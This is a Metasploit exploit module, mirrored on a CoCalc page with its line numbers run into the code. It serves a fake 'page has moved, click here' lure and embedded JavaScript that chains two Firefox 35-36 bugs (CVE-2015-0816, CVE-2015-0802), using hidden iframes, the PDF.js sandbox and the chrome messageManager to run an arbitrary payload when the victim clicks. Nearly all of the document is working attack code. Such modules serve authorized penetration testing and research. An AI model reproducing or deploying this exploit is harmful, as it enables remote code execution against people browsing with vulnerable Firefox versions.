CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/modules/exploits/multi/browser/firefox_pdfjs_privilege_escalation.rb
Views: 1904
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = ManualRanking78include Msf::Exploit::Remote::BrowserExploitServer9include Msf::Exploit::Remote::FirefoxPrivilegeEscalation1011def initialize(info={})12super(update_info(info,13'Name' => 'Firefox PDF.js Privileged Javascript Injection',14'Description' => %q{15This module gains remote code execution on Firefox 35-36 by abusing a16privilege escalation bug in resource:// URIs. PDF.js is used to exploit17the bug. This exploit requires the user to click anywhere on the page to18trigger the vulnerability.19},20'Author' => [21'Unknown', # PDF.js injection code was taken from a 0day22'Marius Mlynski', # discovery and pwn2own exploit23'joev' # copypasta monkey, CVE-2015-080224],25'DisclosureDate' => '2015-03-31',26'License' => MSF_LICENSE,27'References' =>28[29['CVE', '2015-0816'], # pdf.js can load chrome://30['CVE', '2015-0802'] # can access messageManager property in chrome window31],32'Targets' => [33[34'Universal (Javascript XPCOM Shell)', {35'Platform' => 'firefox',36'Arch' => ARCH_FIREFOX37}38],39[40'Native Payload', {41'Platform' => %w{ java linux osx solaris win },42'Arch' => ARCH_ALL43}44]45],46'DefaultTarget' => 0,47'BrowserRequirements' => {48:source => 'script',49:ua_name => HttpClients::FF,50:ua_ver => lambda { |ver| ver.to_i.between?(35, 36) }51}52))5354register_options([55OptString.new('CONTENT', [ false, "Content to display inside the HTML <body>." ])56])57end5859def on_request_exploit(cli, request, target_info)60print_status('Sending exploit...')61send_response_html(cli, html)62end6364def html65"<!doctype html><html><body>#{datastore['CONTENT'] || default_html}"+66"<script>#{js}</script></body></html>"67end6869def default_html70"The page has moved. <span style='text-decoration:underline;'>Click here</span> to be redirected."71end7273def js74key = Rex::Text.rand_text_alpha(5 + rand(12))75frame = Rex::Text.rand_text_alpha(5 + rand(12))76r = Rex::Text.rand_text_alpha(5 + rand(12))77opts = { key => run_payload } # defined in FirefoxPrivilegeEscalation mixin7879<<-EOJS80function xml2string(obj) {81return new XMLSerializer().serializeToString(obj);82}8384function __proto(obj) {85return obj.__proto__.__proto__.__proto__.__proto__.__proto__.__proto__;86}8788function get(path, callback, timeout, template, value) {89callback = _(callback);90if (template && value) {91callback = callback.replace(template, value);92}93js_call1 = 'javascript:' + _(function() {94try {95done = false;96window.onclick = function() {97if (done) { return; } done = true;98q = open("%url%", "q", "chrome,,top=-9999px,left=-9999px,height=1px,width=1px");99setTimeout(function(){100q.location='data:text/html,<iframe mozbrowser src="about:blank"></iframe>';101102setTimeout(function(){103var opts = #{JSON.unparse(opts)};104var key = opts['#{key}'];105q.messageManager.loadFrameScript('data:,'+key, false);106setTimeout(function(){107q.close();108}, 100)109}, 100)110}, 100);111}112} catch (e) {113history.back();114}115undefined;116}, "%url%", path);117js_call2 = 'javascript:;try{updateHidden();}catch(e){};' + callback + ';undefined';118sandboxContext(_(function() {119p = __proto(i.contentDocument.styleSheets[0].ownerNode);120l = p.__lookupSetter__.call(i2.contentWindow, 'location');121l.call(i2.contentWindow, window.wrappedJSObject.js_call1);122}));123setTimeout((function() {124sandboxContext(_(function() {125p = __proto(i.contentDocument.styleSheets[0].ownerNode);126l = p.__lookupSetter__.call(i2.contentWindow, 'location');127l.call(i2.contentWindow, window.wrappedJSObject.js_call2);128}));129}), timeout);130}131132function get_data(obj) {133data = null;134try {135data = obj.document.documentElement.innerHTML;136if (data.indexOf('dirListing') < 0) {137throw new Error();138}139} catch (e) {140if (this.document instanceof XMLDocument) {141data = xml2string(this.document);142} else {143try {144if (this.document.body.firstChild.nodeName.toUpperCase() == 'PRE') {145data = this.document.body.firstChild.textContent;146} else {147throw new Error();148}149} catch (e) {150try {151if (this.document.body.baseURI.indexOf('pdf.js') >= 0 || data.indexOf('aboutNetError') > -1) {;152return null;153} else {154throw new Error();155}156} catch (e) {157;;158}159}160}161}162return data;163}164165function _(s, template, value) {166s = s.toString().split(/^\\s*function\\s+\\(\\s*\\)\\s*\\{/)[1];167s = s.substring(0, s.length - 1);168if (template && value) {169s = s.replace(template, value);170}171s += __proto;172s += xml2string;173s += get_data;174s = s.replace(/\\s\\/\\/.*\\n/g, "");175s = s + ";undefined";176return s;177}178179function get_sandbox_context() {180if (window.my_win_id == null) {181for (var i = 0; i < 20; i++) {182try {183if (window[i].location.toString().indexOf("view-source:") != -1) {184my_win_id = i;185break;186}187} catch (e) {}188}189};190if (window.my_win_id == null)191return;192clearInterval(sandbox_context_i);193object.data = 'view-source:' + blobURL;194window[my_win_id].location = 'data:application/x-moz-playpreview-pdfjs;,';195object.data = 'data:text/html,<'+'html/>';196window[my_win_id].frameElement.insertAdjacentHTML('beforebegin', '<iframe style='+197'"position:absolute; left:-9999px;" onload = "'+_(function(){198window.wrappedJSObject.sandboxContext=(function(cmd) {199with(importFunction.constructor('return this')()) {200return eval(cmd);201}202});203}) + '"/>');204}205206var HIDDEN = 'position:absolute;left:-9999px;height:1px;width:1px;';207var i = document.createElement("iframe");208i.id = "i";209i.style=HIDDEN;210i.src = "data:application/xml,<?xml version=\\"1.0\\"?><e><e1></e1></e>";211document.documentElement.appendChild(i);212i.onload = function() {213if (this.contentDocument.styleSheets.length > 0) {214var i2 = document.createElement("iframe");215i2.id = "i2";216i2.style='opacity: 0;position:absolute;top:0;left:0;right:0;bottom:0;';217i2.height = window.innerHeight+'px';218i2.width = window.innerWidth+'px';219i2.src = "data:application/pdf,";220document.documentElement.appendChild(i2);221pdfBlob = new Blob([''], {222type: 'application/pdf'223});224blobURL = URL.createObjectURL(pdfBlob);225object = document.createElement('object');226object.style=HIDDEN;227object.data = 'data:application/pdf,';228object.onload = (function() {229sandbox_context_i = setInterval(get_sandbox_context, 200);230object.onload = null;231object.data = 'view-source:' + location.href;232return;233});234document.documentElement.appendChild(object);235} else {236this.contentWindow.location.reload();237}238}239240document.body.style.height = window.innerHeight+'px';241242var kill = setInterval(function() {243if (window.sandboxContext) {244var f = "chrome://browser/content/browser.xul";245get(f, function() {}, 0, "%URL%", f);246clearInterval(kill);247} else {248return;249}250},20);251252EOJS253end254end255256257